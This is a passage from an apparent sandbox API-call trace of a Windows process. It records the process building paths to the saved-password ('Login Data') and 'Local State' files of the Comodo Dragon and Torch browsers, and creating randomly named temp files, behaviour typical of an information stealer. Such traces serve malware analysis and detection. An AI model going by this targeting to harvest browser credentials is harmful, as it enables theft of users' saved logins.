returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.439] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.439] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.439] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.439] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.439] lstrlenW (lpString="\\Comodo\\Dragon\\User Data\\Local State") returned 36 [0203.439] VirtualAlloc (lpAddress=0x0, dwSize=0x4a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.439] lstrlenW (lpString="\\Comodo\\Dragon\\User Data\\Local State") returned 36 [0203.439] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Comodo\\Dragon\\User Data\\Local State" | out: lpString1="\\Comodo\\Dragon\\User Data\\Local State") returned="\\Comodo\\Dragon\\User Data\\Local State" [0203.439] lstrlenW (lpString="\\Comodo\\Dragon\\User Data\\Local State") returned 36 [0203.439] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.439] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.439] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.440] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.440] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Comodo\\Dragon\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Local State" [0203.440] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.440] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0203.440] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.441] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.441] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.441] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.441] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.441] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.441] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.442] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.442] lstrlenW (lpString="\\") returned 1 [0203.442] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.442] lstrlenW (lpString="\\") returned 1 [0203.442] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.442] lstrlenW (lpString="\\") returned 1 [0203.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.442] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.442] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.442] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.443] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.443] GetProcessHeap () returned 0x900000 [0203.443] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.443] lstrlenA (lpString="u.btrgv") returned 7 [0203.443] lstrlenA (lpString="u.btrgv") returned 7 [0203.443] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.443] lstrcpyA (in: lpString1=0x2d80000, lpString2="u.btrgv" | out: lpString1="u.btrgv") returned="u.btrgv" [0203.443] lstrlenA (lpString="u.btrgv") returned 7 [0203.443] lstrlenA (lpString="u.btrgv") returned 7 [0203.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.443] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.444] lstrlenA (lpString="u.btrgv") returned 7 [0203.444] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="u.btrgv") returned 8 [0203.444] lstrlenW (lpString="u.btrgv") returned 7 [0203.444] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.444] lstrlenW (lpString="u.btrgv") returned 7 [0203.444] lstrcpyW (in: lpString1=0x2df0000, lpString2="u.btrgv" | out: lpString1="u.btrgv") returned="u.btrgv" [0203.444] lstrlenW (lpString="u.btrgv") returned 7 [0203.444] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.444] lstrcpyW (in: lpString1=0x2e20000, lpString2="u.btrgv" | out: lpString1="u.btrgv") returned="u.btrgv" [0203.444] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.445] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.445] lstrlenW (lpString="u.btrgv") returned 7 [0203.445] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.445] lstrcatW (in: lpString1="", lpString2="u.btrgv" | out: lpString1="u.btrgv") returned="u.btrgv" [0203.445] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.445] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.446] GetProcessHeap () returned 0x900000 [0203.446] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.446] lstrlenW (lpString="u.btrgv") returned 7 [0203.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.446] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.446] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.446] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="u.btrgv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u.btrgv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u.btrgv" [0203.446] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.446] lstrlenW (lpString=".tmp") returned 4 [0203.446] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.447] lstrlenW (lpString=".tmp") returned 4 [0203.447] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.447] lstrlenW (lpString=".tmp") returned 4 [0203.447] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u.btrgv") returned 53 [0203.447] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.447] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.447] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u.btrgv", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u.btrgv.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\u.btrgv.tmp" [0203.447] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.448] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.448] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.448] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.448] lstrlenW (lpString="\\") returned 1 [0203.448] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.448] lstrlenW (lpString="\\") returned 1 [0203.448] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.448] lstrlenW (lpString="\\") returned 1 [0203.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.448] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.448] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.449] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.449] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.449] GetProcessHeap () returned 0x900000 [0203.449] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.449] lstrlenA (lpString="EbFuobi") returned 7 [0203.449] lstrlenA (lpString="EbFuobi") returned 7 [0203.449] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.449] lstrcpyA (in: lpString1=0x2d80000, lpString2="EbFuobi" | out: lpString1="EbFuobi") returned="EbFuobi" [0203.449] lstrlenA (lpString="EbFuobi") returned 7 [0203.450] lstrlenA (lpString="EbFuobi") returned 7 [0203.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.450] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.450] lstrlenA (lpString="EbFuobi") returned 7 [0203.450] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="EbFuobi") returned 8 [0203.450] lstrlenW (lpString="EbFuobi") returned 7 [0203.450] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.450] lstrlenW (lpString="EbFuobi") returned 7 [0203.450] lstrcpyW (in: lpString1=0x2e20000, lpString2="EbFuobi" | out: lpString1="EbFuobi") returned="EbFuobi" [0203.450] lstrlenW (lpString="EbFuobi") returned 7 [0203.450] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.451] lstrcpyW (in: lpString1=0x2eb0000, lpString2="EbFuobi" | out: lpString1="EbFuobi") returned="EbFuobi" [0203.451] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.451] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.451] lstrlenW (lpString="EbFuobi") returned 7 [0203.451] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.451] lstrcatW (in: lpString1="", lpString2="EbFuobi" | out: lpString1="EbFuobi") returned="EbFuobi" [0203.451] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.452] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.452] GetProcessHeap () returned 0x900000 [0203.452] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.452] lstrlenW (lpString="EbFuobi") returned 7 [0203.452] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.452] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.452] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.452] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.452] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="EbFuobi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EbFuobi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EbFuobi" [0203.452] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.453] lstrlenW (lpString=".tmp") returned 4 [0203.453] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.453] lstrlenW (lpString=".tmp") returned 4 [0203.453] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.453] lstrlenW (lpString=".tmp") returned 4 [0203.453] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EbFuobi") returned 53 [0203.453] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.453] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.453] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.454] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EbFuobi", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EbFuobi.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EbFuobi.tmp" [0203.454] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.454] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.454] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.454] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.454] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.454] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.454] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.455] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.455] lstrlenW (lpString="\\Torch\\User Data\\Default\\Login Data") returned 35 [0203.455] VirtualAlloc (lpAddress=0x0, dwSize=0x48, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.455] lstrlenW (lpString="\\Torch\\User Data\\Default\\Login Data") returned 35 [0203.455] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Torch\\User Data\\Default\\Login Data" | out: lpString1="\\Torch\\User Data\\Default\\Login Data") returned="\\Torch\\User Data\\Default\\Login Data" [0203.455] lstrlenW (lpString="\\Torch\\User Data\\Default\\Login Data") returned 35 [0203.455] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.455] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.455] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.456] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.456] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Torch\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Torch\\User Data\\Default\\Login Data" [0203.456] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.457] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.457] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.457] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.457] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.457] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.457] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.457] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.457] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.457] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.458] lstrlenW (lpString="\\Torch\\User Data\\Local State") returned 28 [0203.458] VirtualAlloc (lpAddress=0x0, dwSize=0x3a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.458] lstrlenW (lpString="\\Torch\\User Data\\Local State") returned 28 [0203.458] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Torch\\User Data\\Local State" | out: lpString1="\\Torch\\User Data\\Local State") returned="\\Torch\\User Data\\Local State" [0203.458] lstrlenW (lpString="\\Torch\\User Data\\Local State") returned 28 [0203.458] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.458] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.458] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.458] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.459] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Torch\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Torch\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Torch\\User Data\\Local State" [0203.459] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.459] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0203.459] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.459] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.459] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.460] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.460] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.460] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.460] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.460] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.460] lstrlenW (lpString="\\") returned 1 [0203.460] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.461] lstrlenW (lpString="\\") returned 1 [0203.461] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.461] lstrlenW (lpString="\\") returned 1 [0203.461] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.461] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.461] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.461] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.461] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.461] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.461] GetProcessHeap () returned 0x900000 [0203.461] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.461] lstrlenA (lpString=".plCyBz") returned 7 [0203.461] lstrlenA (lpString=".plCyBz") returned 7 [0203.462] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.462] lstrcpyA (in: lpString1=0x2d80000, lpString2=".plCyBz" | out: lpString1=".plCyBz") returned=".plCyBz" [0203.462] lstrlenA (lpString=".plCyBz") returned 7 [0203.462] lstrlenA (lpString=".plCyBz") returned 7 [0203.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.462] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.462] lstrlenA (lpString=".plCyBz") returned 7 [0203.462] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr=".plCyBz") returned 8 [0203.462] lstrlenW (lpString=".plCyBz") returned 